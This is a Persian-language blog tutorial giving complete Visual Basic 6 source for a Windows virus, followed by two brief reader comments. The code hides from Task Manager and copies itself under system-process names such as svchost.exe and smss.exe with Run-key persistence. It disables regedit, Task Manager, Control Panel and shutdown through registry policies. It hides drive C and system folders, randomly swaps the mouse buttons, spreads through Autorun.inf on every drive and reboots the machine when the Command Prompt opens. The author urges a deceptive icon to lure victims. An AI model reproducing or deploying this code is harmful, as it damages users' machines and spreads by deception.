اخطار : این وبلاگ هیچگونه مسئولیتی در قبال استفاده های ناهنجار و مخرب از آموزشهای این بخش را نخواهد پذیرفت و مسئولیت استفاده از مطالب این بخش از وبلاگ فقط با شماست. مطالب این بخش از وبلاگ مختص کسانی است که قصد یادگیری و درک طرز کار ویروس ها را دارند خواهد بود. توصیه میشود مطالب این بخش را فقط برای یادگیری هر چه بهتر ویژوال بیسیک مطالعه نمایید و از سو استفاده های غیر اخلاقی و آزار و اذیت، جدّاً خودداری نمایید.
توجه : استفاده از مطالب این بخش فقط با ذکر منبع مجاز میباشد.
خب الوعده وفا. اینم آموزش ساخت ویروسی که قولشو داده بودم، یک ویروس خطرناک.
درباره ویروس : خرابکاری های این ویروس عبارت اند از :
1- اعمال محدودیت های زیر از طریق رجیستری :
· غیر فعال کردن رجیستری (DisableRegEdit)
· غیر فعال کردن Task Manager (DisableTaskManager)
· غیر فعال کردن تنظیمات صفحه نمایش (DisableDisplayProperties)
· غیر فعال کردن Shutdown (DisableShutdown)
· غیر فعال کردن جستجو (DisableSearch)
· غیر فعال کردن System Properties (DisableMyComputerProperties)
· غیر فعال کردن Run (DisableRun)
· ناپدید کردن All Programs از منوی Start (DisableAllPrograms)
· مخفی کردن درایو C: (HideDrive_C)
· غیر فعال کردن کنترل پنل (DisableControlPanel)
· غیر فعال کردن Folder Options (DisableFolderOption)
· محدود کردن نمایش فایلهای مخفی (DontShowHiddenFiles)
· محدود کردن نمایش فایلهای ابر مخفی (DontShowSuperHiddenFiles)
· غیر فعال کردن Add/Remove (DisableAddRemove)
· تغییر نام و کمپانی کامپیوتر (ChangeNameAndCompanyName)
2- تغییر دادن کلیک چپ و راست ماوس هر چند لحظه یک بار از طریق توابع API
3- اجرای شدن خودکار ویروس موقع Open کردن درایوها با استفاده از فایل Autorun.inf
ویروس جالبی به نظر میرسه چون کاربر رو خیلی محدود میکنه و باعث میشه که کاربر راهی جز تعویض ویندوز نداشته باشه.
بعضی از محدودیت های ذکر شده در بند 1 بلافاصله پس از اجرای ویروس اعمال میشن، مثلاً عیر فعال کردن Task Manager و Registry و Folder Options و چند تای دیگه. برای اعمال شدن تغییرات و محدودیت های دیگه، ویندوز باید یکبار Logoff یا راه اندازی دوباره بشه.
این ویروس در ابتدای اجرا از کد App.TaskVisible = False استفاده میکنه که باعث میشه برنامه تو Task Manager دیده نشه و این خیلی به نفع شما و به ضرر کاربره. این ویروس بلافاصله پس از اجرا، یک نسخه از خودشو با نامهای svchost.exe و spoolsv.exe در پوشه System32Drivers کپی میکنه و یک نسخه با نام smss.exe رو هم در مسیر All UsersApplication Data کپی میکنه و بعد همشون رو تو Startup قرار میده و بعد اجراشون میکنه که با اینکار آنتی ویروسها میتونن اونو شناسایی کنن. مزیت اینکارا اینه که کاربر نتونه ویروسی رو که با نام smss.exe اجرا شده از حافظه خارج کنه (End Task). در ضمن پوشه های داخل درایو ویندوز رو ابر مخفی (Super Hidden) میکنه.
توجه : برای درک و فهم بهتره مطالب این بخش، باید با رجیستری و طرز کار اون آشنا باشید که در ادامه بیشتر توضیح میدم.
این ویروس از دو بخش تشکیل شده : اول بخش خرابکاری و دستکاری رجیستری. دوم بخش بلاک اصلی برنامه که میتونید هر چیزی که دلتون میخواد اونجا اضافه کنید. برای اینکه کارای ویروس مدام انجام بشن و محدود به لود فرم نباشن باید اونا رو تو یک یا چند تا تایمر قرار بدید. من از سه تایمر استفاده کردم تایمر اول برای عوض کردن کلید چپ و راست ماوس است، تایم دوم بر ای تعیین Interval تایمر اوله تا حالت یکنواختی پیدا نکنه و هر چند لحظه یکبار (بین 1 تا 5 ثانیه) کلید چپ و راست ماوس عوض بشه و تایمر سوم هم سه کار انجام میده : 1- ساختن فایل Autorun.inf تو تمام درایوها 2- بستن System Configuration Utility که احتمال میره کاربر اونو باز کنه 3- بستن Command Prompt که احتمال میره کاربر اونو باز کنه.
خب توضیحات درباره ویروس کافیه بهتره بریم سر وقته آموزش.
آموزش ساخت :
اول یک پروژه جدید باز کنید و بهش دو تا Module اضافه کنید و به فرمتون هم سه تا تایمر و اضافه کنید و مشخصات زیر رو تغییر بدید :
[Form Properties]
Name = frmVirus
BorderStyle = 0 - None
Caption = خالی بذارید
ShowInTaskbar = False
Height = 0
Width = 0
Left = -5000
Top = -5000
Visible = False
[Timers Properties]
Timer1.Interval = 0
Timrr2.Interval = 5000
Timer3.Interval = 500
حالا کدهای زیر رو تو قسمت جنرال فرمتون کپی کنید :
Dim bln As Boolean
Private Sub Form_Load()
App.TaskVisible = False
If App.PrevInstance = True Then End
Dim Ret As Long
Dim CLR As Long
Me.BackColor = RGB(1, 1, 1)
CLR = Me.BackColor
Ret = GetWindowLong(Me.hWnd, GWL_EXSTYLE)
Ret = Ret Or WS_EX_LAYERED
SetWindowLong Me.hWnd, GWL_EXSTYLE, Ret
SetLayeredWindowAttributes Me.hWnd, CLR, 0, LWA_COLORKEY
Dim sSave As String
On Error Resume Next
strSource = App.Path & IIf(Len(App.Path) > 0, "", Empty)
strSource = strSource & App.EXEName & ".exe"
SetAttr WinDrive & "Windows", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
SetAttr WinDrive & "Program Files", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
SetAttr WinDrive & "Documents and Settings", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
SetAttr WinDrive & "WindowsSystem", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
SetAttr WinDrive & "WindowsSystem32", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
If (App.EXEName <> "svchost" And App.EXEName <> "spoolsv" And App.EXEName <> "smss") Then
strDest = WinDrive & "WINDOWSsystem32drivers"
FileCopy strSource, strDest & "svchost.exe"
AddToRun "svchost", strDest & "svchost.exe"
SetAttr strDest & "svchost.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & "svchost.exe", vbNormalNoFocus
FileCopy strSource, strDest & "spoolsv.exe"
AddToRun "spoolsv", strDest & "spoolsv.exe"
SetAttr strDest & "spoolsv.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & "spoolsv.exe", vbNormalNoFocus
strDest = WinDrive & "Documents and SettingsAll UsersApplication Data"
FileCopy strSource, strDest & "smss.exe"
AddToRun "smss", strDest & "smss.exe"
SetAttr strDest & "smss.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & "smss.exe", vbNormalNoFocus
End If
Call Sabotage
'
Timer2.Enabled = True
Timer3.Enabled = True
End Sub
Private Sub Timer1_Timer()
If bln = True Then
bln = False
Timer1.Enabled = False
Call SwapMouseButton(1)
Else
bln = True
Call SwapMouseButton(0)
End If
If blnBlockinput = True Then Call BlockInput(0)
End Sub
Private Sub Timer2_Timer()
If Timer1.Enabled = False Then
Timer1.Interval = CLng(Rnd * 5000)
Timer1.Enabled = True
End If
End Sub
Private Sub Timer3_Timer()
Call MakeAutoRun
Call CloseProgram("System Configuration Utility")
Call CloseProgram("Command Prompt")
End Sub
خب حالا کد زیر رو تو Module1 کپی کنید :
Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal HKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal HKey As Long, ByVal lpValueName As String) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal HKey As Long) As Long
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal HKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Const HKEY_CLASSES_ROOT = &H80000000
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_USERS = &H80000003
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Public Const REG_NONE = 0
Public Const REG_MULTI_SZ = 7
Public Const REG_EXPAND_SZ = 2
Public Const REG_BINARY = 3
Public Declare Function SetWindowLong Lib "User32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Public Declare Function SetLayeredWindowAttributes Lib "user32.dll" (ByVal hWnd As Long, ByVal crKey As Long, ByVal bAlpha As Byte, ByVal dwFlags As Long) As Long
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SetWindowText Lib "User32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String) As Long
Public Declare Function EnumWindows Lib "User32" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Public Declare Function IsWindowVisible Lib "User32" (ByVal hWnd As Long) As Long
Public Declare Function GetParent Lib "User32" (ByVal hWnd As Long) As Long
Public Declare Function GetWindowLong Lib "User32" Alias "GetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long) As Long
Public Declare Function GetWindowText Lib "User32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function SendMessage Lib "User32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Const GWL_HWNDPARENT = (-8)
Public Const LB_ADDSTRING = &H180
Public Const LB_SETITEMDATA = &H19A
Public Declare Function GetActiveWindow Lib "User32" () As Long
Public Declare Function GetWindowDC Lib "User32" (ByVal hWnd As Long) As Long
Public Declare Function TextOut Lib "gdi32" Alias "TextOutA" (ByVal hdc As Long, ByVal X As Long, ByVal Y As Long, ByVal lpString As String, ByVal nCount As Long) As Long
Public Declare Function BlockInput Lib "User32" (ByVal fBlock As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Const LWA_COLORKEY = &H1
Public Const GWL_EXSTYLE = (-20)
Public Const WS_EX_LAYERED = &H80000
Public Const BM_SETSTATE = &HF3
Public Const HWND_TOPMOST = -1
Public Const HWND_NOTOPMOST = -2
Public Const SWP_NOMOVE = &H2
Public Const SWP_NOSIZE = &H1
Public Const SWP_NOACTIVATE = &H10
Public Const SWP_SHOWWINDOW = &H40
Public Const TOPMOST_FLAGS = SWP_NOMOVE Or SWP_NOSIZE
Public Declare Function SwapMouseButton Lib "User32" (ByVal bSwap As Long) As Long
Public Declare Function SetWindowPos Lib "User32" (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, Y, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Const TH32CS_SNAPHEAPLIST = &H1
Const TH32CS_SNAPPROCESS = &H2
Const TH32CS_SNAPTHREAD = &H4
Const TH32CS_SNAPMODULE = &H8
Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Const TH32CS_INHERIT = &H80000000
Const MAX_PATH As Integer = 260
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
Public Declare Function FindWindow Lib "User32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public hSnapShot As Long, uProcess As PROCESSENTRY32
Public blnMsgBoxResult As Boolean
Public strSource As String, strDest As String
Public strOutput(20) As String, strTemp As String
Public blnBlockinput As Boolean
Public strSysDir As String, strFileExist As String
Public strAppPath As String
و حالا کد زیر رو تو Module2 کپی کنید :
Private Sub SaveString(ByVal HKey As Long, strPath As String, strValue As String, ByVal lngdata As Long, ByVal lngType As Long, ByVal lngLen As Long)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKey, strPath, keyhand)
r = RegSetValueEx(keyhand, strValue, 0, lngType, lngdata, CLng(lngLen))
r = RegCloseKey(keyhand)
End Sub
Public Sub MakeTopMost(lngHwnd As Long)
SetWindowPos lngHwnd, HWND_TOPMOST, 0, 0, 0, 0, TOPMOST_FLAGS
End Sub
Public Function WinDrive() As String
Dim strDrive As String
strDrive = Space(500)
A = GetWindowsDirectory(strDrive, Len(strDrive))
strDrive = Left(strDrive, 3)
WinDrive = strDrive
End Function
Public Sub CloseProgram(ByVal WindowName As String)
On Error Resume Next
Handle = FindWindow(vbNullString, WindowName)
If Handle = 0 Then Exit Sub
Call SendMessage(Handle, &H10, 0&, 0&)
Shell "Shutdown -r -t 0"
End Sub
Public Sub MakeAutoRun()
On Error Resume Next
strAutorun = "[autorun]" & vbCrLf & _
"OPEN=Autorun.exe" & vbCrLf & _
"shellopen=Open" & vbCrLf & _
"shellopenCommand=Autorun.exe" & vbCrLf & _
"shellexplore=Explore" & vbCrLf & _
"shellexploreCommand=""Autorun.exe -e"""
For I = 67 To 90 ' az Drive C: ta Drive Z:
Open Chr(I) & ":Autorun.inf" For Output As #1
Print #1, strAutorun
Close #1
SetAttr Chr(I) & ":Autorun.inf", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
FileCopy WinDrive & "Documents and SettingsAll UsersApplication Datasmss.exe", Chr(I) & ":Autorun.exe"
SetAttr Chr(I) & ":Autorun.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Next
End Sub
Public Sub Sabotage() ' Sabotage = Kharab kari
Call DisableRegEdit
Call DisableTaskManager
Call DisableDisplayProperties
Call DisableShutdown
Call DisableSearch
Call DisableMyComputerProperties
Call DisableRun
Call DisableAllPrograms
Call HideDrive_C
Call DisableControlPanel
Call DisableFolderOption
Call DontShowHiddenFiles
Call DontShowSuperHiddenFiles
Call DisableAddRemove
Call ChangeNameAndCompanyName
End Sub
Private Sub DisableRegEdit()
Call SaveString(HKEY_CURRENT_USER, "SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem", "DisableRegistryTools", 1, REG_DWORD, 4)
End Sub
Private Sub DisableTaskManager()
Call SaveString(HKEY_CURRENT_USER, "SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem", "DisableTaskMgr", 1, REG_DWORD, 4)
End Sub
Private Sub DisableDisplayProperties()
Call SaveString(HKEY_CURRENT_USER, "SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem", "NoDispCPL", 1, REG_DWORD, 4)
End Sub
Private Sub DisableShutdown()
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionpoliciesExplorer", "NoClose", 1, REG_DWORD, 4)
End Sub
Private Sub DisableSearch()
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoFind", 1, REG_DWORD, 4)
End Sub
Private Sub DisableMyComputerProperties()
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoPropertiesMyComputer", 1, REG_DWORD, 4)
End Sub
Private Sub DisableRun()
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoRun", 1, REG_DWORD, 4)
End Sub
Private Sub DisableAllPrograms()
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoStartMenuMorePrograms", 1, REG_DWORD, 4)
End Sub
Private Sub HideDrive_C()
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoDrives", 4, REG_DWORD, 4)
End Sub
Private Sub DisableControlPanel()
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoControlPanel", 1, REG_DWORD, 4)
End Sub
Private Sub DisableFolderOption()
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoFolderOptions", 1, REG_DWORD, 4)
End Sub
Private Sub DontShowHiddenFiles()
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenNOHIDDEN", "CheckedValue", 2, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL", "CheckedValue", 0, REG_DWORD, 4)
Call SaveString(HKEY_CURRENT_USER, "SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced", "Hidden", 0, REG_DWORD, 4)
End Sub
Private Sub DontShowSuperHiddenFiles()
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHidden", "CheckedValue", 0, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHidden", "UncheckedValue", 0, REG_DWORD, 4)
Call SaveString(HKEY_CURRENT_USER, "SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced", "SuperHidden", 0, REG_DWORD, 4)
End Sub
Private Sub DisableAddRemove()
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall", "NoAddRemovePrograms", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall", "NoAddFromCDorFloppy", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall", "NoAddFromInternet", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall", "NoAddFromNetwork", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall", "NoAddPage", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall", "NoRemovePage", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall", "NoServices", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall", "NoSetFolders", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall", "NoSupportInfo", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall", "NoWindowsSetupPage", 1, REG_DWORD, 4)
End Sub
Private Sub ChangeNameAndCompanyName()
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWAREMicrosoftWindows NTCurrentVersion", keyhand)
r = RegSetValueEx(keyhand, "RegisteredOwner", 0, REG_SZ, ByVal "Amir Amiri", Len("Amir Amiri"))
r = RegSetValueEx(keyhand, "RegisteredOrganization", 0, REG_SZ, ByVal "Http://V-Basic.Mihanblog.Com", Len("Http://V-Basic.Mihanblog.Com"))
r = RegCloseKey(keyhand)
End Sub
Public Sub AddToRun(ProgramName As String, FileToRun As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKEY_LOCAL_MACHINE, "SoftwareMicrosoftWindowsCurrentVersionRun", keyhand)
r = RegSetValueEx(keyhand, ProgramName, 0, REG_SZ, ByVal FileToRun, Len(FileToRun))
r = RegCloseKey(keyhand)
End Sub
برنامه رو ذخیره کنید و ازش یه فایل .exe بسازید و اجراش کنید تا بیچاره بشید. سعی کنید برای ویروستون یک آیکون گول زننده و جذاب بذارید تا کاربر به محض مشاهده حس کنجکاویش کار دستش بده. تا اینجا تونستید یک ویروس بسازید ولی اگر اجراش کنید وقعاً بیچاره میشید پس دست نگه دارید. هر ویروسی باید یک آنتی ویروس داشته باشه و چون ویروس ما به شدت آزار دهنده و کمی هم مخربه پس باید آنتی ویروسشو در کنارش داشته باشید. ویروس ما محدودیت هایی رو به کاربر اعامل میکنه که شما میدونید اون محمدودیت ها چی هستن و چه طور اعمال شدن پس میتونید به راحتی اونا رو خنثی کنید. موفق باشید.
خیلی عالیه
ولی هنوز من کدها را اجرا نکرده ام